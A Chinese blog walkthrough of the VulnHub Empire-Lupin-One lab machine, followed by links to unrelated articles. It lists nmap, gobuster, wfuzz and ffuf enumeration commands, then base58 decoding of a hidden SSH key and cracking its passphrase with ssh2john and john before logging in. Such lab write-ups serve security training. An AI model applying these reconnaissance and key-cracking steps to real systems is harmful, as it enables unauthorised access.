当前位置: 首页 > article >正文

vulnhub Empire-Lupin-One靶机

搭建靶机;拖进来就行

扫描靶机IP

nmap -O 192.168.47.130

1.信息收集

nmap -p- 192.168.47.133
nmap -sC -sV -p 22,80 192.168.47.133 -oN nmap.log

目录扫描

gobuster dir -w 字典目录 -u 目标
gobuster dir -w zi.txt -u http://192.168.47.133/

2.寻找薄弱点

查看robots.txt文件,发现一个不可访问的~myfiles文件,下面应该有其他文件,模糊测试下

wfuzz -c -w zi.txt -u http://192.168.47.133/~FUZZ | grep -v 404

扫到一个 secret

3.解密

得到一封信重要的有:1.存在隐藏文件 2.用fasttrack字典爆破密码 3.用户名icex64

ffuf -u 'http://192.168.47.133/~secret/.FUZZ' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .txt,.pub,.html,.bak -mc 200

直接去访问一下这个文件mysecret.txt

去解密一下

base64解密不出来;base58可以;这就是登录系统的私钥

创建两个文档;2.txt写我们解密后的数据;1.txt空的

我们可以利用kali自带的ssh2john进行密码的暴力破解

把我们解密后的数据写到1.txt

ssh2john 2.txt > 1.txt
john --wordlist=/usr/share/wordlists/fasttrack.txt 1.txt
得到密码P@55w0rd!
用户名:icex64
密码:P@55w0rd!

4.登录系统

#如果出现报错//报错的原因是Linux和Windows的换行符不一致
chmod 600 key	#提升权限
dos2unix key	#改变格式
#在连接
ssh icex64@192.168.47.133 -i key

成功获取flag


http://www.kler.cn/a/464004.html

相关文章:

  • Halcon 显示异常
  • 【NLP高频面题】用RNN训练语言模型时如何计算损失?
  • 除了淘宝、天猫和京东,其他电商平台的按图搜索商品API返回值结构是怎样的?
  • 38 Opencv HOG特征检测
  • 大模型 LangChain 开发框架:Runable 与 LCEL 初探
  • 《Xsens动捕与人形机器人训练》讲座将于1月9日下午2:30在线上召开
  • 27.循环里赋值了,循环外使用提示变量未赋值 C#例子
  • C++软件设计模式之模板方法模式
  • Lumos学习王佩丰Excel第二十三讲:Excel图表与PPT
  • 数据分析-Excel
  • 大数据面试笔试宝典之Flink面试
  • 内网穿透wordPress的问题
  • 【SpringMVC】拦截器
  • Servlet会话跟踪
  • AI驱动的PDF翻译保留排版格式-PDFMathTranslate
  • Flutter 调试环境下浏览器网络请求跨域问题解决方案
  • JVS低代码快速开发中“实体之间的关系”配置,表单引擎子表构建全攻略
  • 高等数学学习笔记 ☞ 无穷小与无穷大
  • 王佩丰24节Excel学习笔记——第二十二讲:制作甘特图与动态甘特图
  • Three.js教程008:使用lil-GUI调试开发3D效果
  • RK3568平台开发系列讲解(Linux文件系统篇)缓存
  • [Spring] MyBatis操作数据库(基础)
  • 【RK3588 Linux 5.x 内核编程】-I2C虚拟驱动(模板)
  • vue-table-<td colspan=“2“>不生效
  • 100天精通Python(爬虫篇)——第113天:爬虫基础模块之urllib详细教程大全
  • Excel 后,我们需要怎样的数据分析软件